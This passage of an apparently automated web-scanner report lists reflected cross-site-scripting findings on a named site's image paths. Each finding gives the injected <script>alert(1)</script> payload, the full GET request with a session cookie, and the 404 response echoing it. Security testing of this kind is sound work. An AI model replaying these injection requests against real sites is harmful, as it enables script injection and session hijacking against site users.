<p>The requested URL /adult/media-chat/themes/kosmos/images/ratinga0961<script>alert(1)</script>ceae5019b7e/0.gif was not found on this server.</p>
...[SNIP]...

2.83. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c511b<script>alert(1)</script>4c48cb9771f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating/0.gifc511b<script>alert(1)</script>4c48cb9771f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/0.gifc511b<script>alert(1)</script>4c48cb9771f was not found on this server.</p>
...[SNIP]...

2.84. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7c7eb<script>alert(1)</script>c21c11603f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating/0.gif?7c7eb<script>alert(1)</script>c21c11603f6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/0.gif?7c7eb<script>alert(1)</script>c21c11603f6=1 was not found on this server.</p>
...[SNIP]...

2.85. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47d1d<script>alert(1)</script>b7c8b3bf3ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult47d1d<script>alert(1)</script>b7c8b3bf3ac/media-chat/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult47d1d<script>alert(1)</script>b7c8b3bf3ac/media-chat/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.86. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 70587<script>alert(1)</script>66d5e9d1a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat70587<script>alert(1)</script>66d5e9d1a3/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat70587<script>alert(1)</script>66d5e9d1a3/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.87. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b908b<script>alert(1)</script>37312c143be was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themesb908b<script>alert(1)</script>37312c143be/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themesb908b<script>alert(1)</script>37312c143be/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.88. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5bb6d<script>alert(1)</script>aeb33bd428a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos5bb6d<script>alert(1)</script>aeb33bd428a/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos5bb6d<script>alert(1)</script>aeb33bd428a/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.89. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 115dc<script>alert(1)</script>3f0dab8b896 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images115dc<script>alert(1)</script>3f0dab8b896/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images115dc<script>alert(1)</script>3f0dab8b896/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.90. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a289b<script>alert(1)</script>c4e68e05bd8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/ratinga289b<script>alert(1)</script>c4e68e05bd8/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/ratinga289b<script>alert(1)</script>c4e68e05bd8/3half.gif was not found on this server.</p>
...[SNIP]...

2.91. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload fbb09<script>alert(1)</script>7e22cdc7464 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating/3half.giffbb09<script>alert(1)</script>7e22cdc7464 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/3half.giffbb09<script>alert(1)</script>7e22cdc7464 was not found on this server.</p>
...[SNIP]...

2.92. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/3half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2d9b7<script>alert(1)</script>5062acd7568 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating/3half.gif?2d9b7<script>alert(1)</script>5062acd7568=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/3half.gif?2d9b7<script>alert(1)</script>5062acd7568=1 was not found on this server.</p>
...[SNIP]...

2.93. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9a0fd<script>alert(1)</script>b61da89c8f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult9a0fd<script>alert(1)</script>b61da89c8f1/media-chat/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult9a0fd<script>alert(1)</script>b61da89c8f1/media-chat/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.94. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 78656<script>alert(1)</script>64dc557d70 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat78656<script>alert(1)</script>64dc557d70/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat78656<script>alert(1)</script>64dc557d70/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.95. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload be2f9<script>alert(1)</script>618e7765039 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themesbe2f9<script>alert(1)</script>618e7765039/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themesbe2f9<script>alert(1)</script>618e7765039/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.96. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7c7e7<script>alert(1)</script>df3bcb58741 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos7c7e7<script>alert(1)</script>df3bcb58741/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos7c7e7<script>alert(1)</script>df3bcb58741/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.97. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f7683<script>alert(1)</script>03707598cfd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/imagesf7683<script>alert(1)</script>03707598cfd/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/imagesf7683<script>alert(1)</script>03707598cfd/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.98. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d9909<script>alert(1)</script>6702c56ed93 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/ratingd9909<script>alert(1)</script>6702c56ed93/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/ratingd9909<script>alert(1)</script>6702c56ed93/4.gif was not found on this server.</p>
...[SNIP]...

2.99. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 20ca6<script>alert(1)</script>54859c137 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating/4.gif20ca6<script>alert(1)</script>54859c137 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/4.gif20ca6<script>alert(1)</script>54859c137 was not found on this server.</p>
...[SNIP]...

2.100. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/4.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fc88b<script>alert(1)</script>17ece1eaeb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating/4.gif?fc88b<script>alert(1)</script>17ece1eaeb1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/4.gif?fc88b<script>alert(1)</script>17ece1eaeb1=1 was not found on this server.</p>
...[SNIP]...

2.101. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 86e21<script>alert(1)</script>bac0f3b21f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult86e21<script>alert(1)</script>bac0f3b21f3/media-chat/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
